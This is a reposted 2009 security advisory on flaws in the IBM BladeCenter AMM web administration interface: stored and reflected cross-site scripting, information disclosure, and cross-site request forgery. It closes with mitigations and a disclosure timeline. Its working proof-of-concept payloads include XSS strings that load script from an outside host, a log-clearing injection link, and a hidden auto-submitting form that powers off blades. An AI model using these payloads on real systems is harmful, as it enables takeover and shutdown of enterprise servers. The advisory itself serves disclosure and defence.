|
Brought to you by:
Suppliers of:
|
|
|
| |
"In today s high-demand enterprise environment, organizations need a reliable infrastructure to run compute-intensive applications with minimal maintenance and downtime. IBM BladeCenter H is a powerful platform built with the enterprise customer in mind, providing industry-leading performance, innovative architecture and a solid foundation for virtualization."
"Provides easy integration to promote innovation and help manage growth, complexity and risk"
During a quick overview of BladeCenter AMM web access, it was discovered that web administration interface has multiple vulnerabilities regarding input and request validation. |
| |
Credit:
The information has been provided by Henri Lindberg.
The original article can be found at: http://www.louhinetworks.fi/advisory/ibm_090409.txt
|
| |
Cross Site Scripting
Type 2:
Most serious issue discovered was the persistent XSS vulnerability on the event log page resulting from displaying unsanitized user input received from an invalid login attempt.
This can be exploited without valid credentials or social engineering. Access to device administration IP address is needed and an administrator has to view event log at some point, however.
Successful attack requires that an administrator visits event log page, thus enabling the attacker to control the chassis and blade configuration by running the injected content which is interpreted by the administrator's browser.
For example, all blades can be shut down or new admnistrative users can be added, depending on administrator's access rights.
Unsuccessful login attempts are displayed without HTML encoding or input sanitation in the event log. It is possible to inject a reference to a remote javascript file by using eg following username:
</script><script src="//l7.fi"></script><script>
Notes:
If user input contains </script>, dynamic javascript is spilled out on the page and it is quite easy to mess up formatting of the event log page.
Log can be cleared by an authenticated administrator from URL:
http://1.2.3.4/private/clearlog
Event log javascript format:
parent.LogEntryArray[i++] = new LogEntry( "1","2","Audit
","SN#420420313370","09/09/08","04:20:42","Remote login failed
for user '</script><script src='//l7.fi'></script><script>' from
Web at IP 1.2.3.4");
HTML-injection can be performed for example with following "username":
<a href="private/clearlog">Mallory</a>
This results in:
<TD>Remote login failed for user '<a href='private/clearlog'>
Mallory</a>' from Web at IP 1.2.3.4</TD>
Entries from event log are also displayed on the AMM Service Data page.
Type 1:
File manager displays user input on the page "as is".
Successful exploitation requires social engineering an authenticated administrator to visit the hostile URL.
Example URL:
http://1.2.3.4/private/file_management.ssi?
PATH=/etc"><script%20src="http://l7.fi"></script>
Information Disclosure
A readonly operator (for example, a Blade operator with a scope assigment to one Blade) can view security permissions of other users (access roles and scopes) by forcefully browsing to their respective login profile pages:
http://1.2.3.4/private/login.ssi?WEBINDEX=<n>&JUNK=1
where <n> is the assigned integer value (1..12) of the user
account
Cross Site Request Forgery
BladeCenter AMM does not validate the origin of an HTTP request.
If attacker is able to lure or force an authenticated administrator to view malicious content, the Advanced Management Module web administration interface can be controlled by submitting suitable forms. Attacker is then effectively acting as an administrator.
Successful attack requires that the attacker knows the management interface address for the target device.
As the management interface allows "No session timeout" option, user can be vulnerable to this attack even after closing a tab containing the management interface, if cached authentication is not cleared from browser.
Proof of Concept:
Example form (Powers off Blades 1-4):
<html>
<body onload="document.foobar.submit()">
<form name="foobar" method="post"
action="http://1.2.3.4/private/blade_power_action"
style="display:none">
<input name="COMMAND" value="6.3.2">
<input name="STATE" value="0">
<input name="CHECKED" value="15">
<input name="selall" value="on">
<input name="sel" value="bl1">
<input name="sel" value="bl2">
<input name="sel" value="bl3">
<input name="sel" value="bl4">
<input name="JUNK" value="1">
</form>
<body>
</html>
More information:
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076204&brandind=5000020
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076206&brandind=5000020
Mitigation:
* Do not use Web Access for configuring the chassis and blades.
* Limit access to web administration interface.
* Do not use "No session timeout" option.
* Always logout and close all browser windows after performing administrative tasks.
* Do not browse untrusted sites while performing administrative tasks
* Only grant access to web administration to trusted users
Disclosure Timeline:
9. September 2008 - Contacted CERT-FI by email
22. October 2008 - Provided IBM with a clarification why SSL usage does not fix CSRF vulnerability
9. April 2009 - Advisory released
|
|
|
|
|
